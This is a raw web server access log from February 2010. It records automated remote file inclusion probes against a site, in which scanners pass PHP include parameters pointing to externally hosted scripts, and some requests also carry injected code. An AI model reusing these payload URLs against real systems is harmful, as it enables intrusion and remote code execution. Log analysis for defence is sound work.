58.230.162.220 - - [25/Feb/2010:07:19:35 -0800] "GET /logs/access_100208.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:19:39 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:07:19:54 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [25/Feb/2010:07:19:54 -0800] "GET /delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:07:19:54 -0800] "GET /logs/access_100203.log//delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [25/Feb/2010:07:19:58 -0800] "GET /logs/access_100206.log//delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:20:21 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:20:21 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:20:21 -0800] "GET /logs/access_100210.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:20:22 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:20:22 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:20:22 -0800] "GET /logs/access_100210.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:20:25 -0800] "GET /logs//index.php?option=com_jcalpro&Itemid=&mosConfig.absolute.path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:20:25 -0800] "GET /logs/access_100128.log%20%20//index.php?option=com_jcalpro&Itemid=&mosConfig.absolute.path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:20:25 -0800] "GET /home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:20:25 -0800] "GET /logs/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:20:25 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:20:25 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:07:20:25 -0800] "GET /index.php?option=com_jcalpro&Itemid=&mosConfig.absolute.path=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:20:28 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:21:23 -0800] "GET /logs/access_100206.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:21:37 -0800] "GET /logs/access_100206.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:22:01 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:22:01 -0800] "GET /logs/access_100129.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:22:01 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:04 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:05 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:05 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:05 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:22:08 -0800] "GET /logs/access_100219.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:16 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:16 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:17 -0800] "GET /logs//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:17 -0800] "GET /logs/access.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:17 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:17 -0800] "GET /board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:22 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:24 -0800] "GET /logs//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:24 -0800] "GET /board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:25 -0800] "GET /logs/access.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:07:22:28 -0800] "GET /logs/access_100203.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:22:45 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:22:46 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:07:22:49 -0800] "GET /logs/access_100217.log//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:23:08 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:07:23:10 -0800] "GET /delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.155 - - [25/Feb/2010:07:23:15 -0800] "GET /logs/access_100206.log//delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
219.150.205.156 - - [25/Feb/2010:07:23:16 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:24:21 -0800] "GET /logs/access_100203.log//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:26 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:26 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:26 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:32 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:32 -0800] "GET /logs/access_100219.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:24:32 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:24:43 -0800] "GET /logs/access_100214.log//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:07:24:51 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:07:24:51 -0800] "GET /logs/errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [25/Feb/2010:07:24:51 -0800] "GET /errors.php?error=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:25:23 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [25/Feb/2010:07:25:30 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:25:34 -0800] "GET /logs/access_100212.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:26:12 -0800] "GET /logs/access_100202.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:26:12 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:26:12 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:26:29 -0800] "GET /logs/access_100214.log//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:26:49 -0800] "GET /logs/access_100201.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:26:49 -0800] "GET /hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:26:49 -0800] "GET /logs//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:27:00 -0800] "GET /logs/access_100215.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:20 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:20 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:21 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:27:26 -0800] "GET /logs/access_100213.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:28 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:31 -0800] "GET /logs/access_100214.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:27:38 -0800] "GET /logs/access_100214.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:27:58 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:27:58 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:27:59 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:28:14 -0800] "GET /logs/access_100212.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:28:14 -0800] "GET /logs/access_100214.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:07:28:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:07:28:40 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:07:28:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:07:28:44 -0800] "GET /logs/access_100118.log///playing.php/common/db.php?commonpath=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:07:28:48 -0800] "GET /logs/access_100126.log///playing.php/common/db.php?commonpath=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /logs//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /logs/access_100213.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /logs//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:02 -0800] "GET /logs/access_100213.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:29:19 -0800] "GET /calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:29:19 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:29:19 -0800] "GET /logs/access_100202.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:43 -0800] "GET /logs/access_100201.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:29:44 -0800] "GET /logs/access_100201.log%20%20//hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:07:29:47 -0800] "GET /logs/access_100215.log%20%20//calendar//tools/send_reminders.php?noSet=0&includedir=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:29:56 -0800] "GET ///delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:07:29:57 -0800] "GET /logs/access_100205.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:30:04 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:30:04 -0800] "GET /logs/access_100203.log%20%20////delete_comment.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:30:09 -0800] "GET /logs/access_100219.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:30:24 -0800] "GET /logs/access_100214.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:30:49 -0800] "GET /logs/access_100210.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
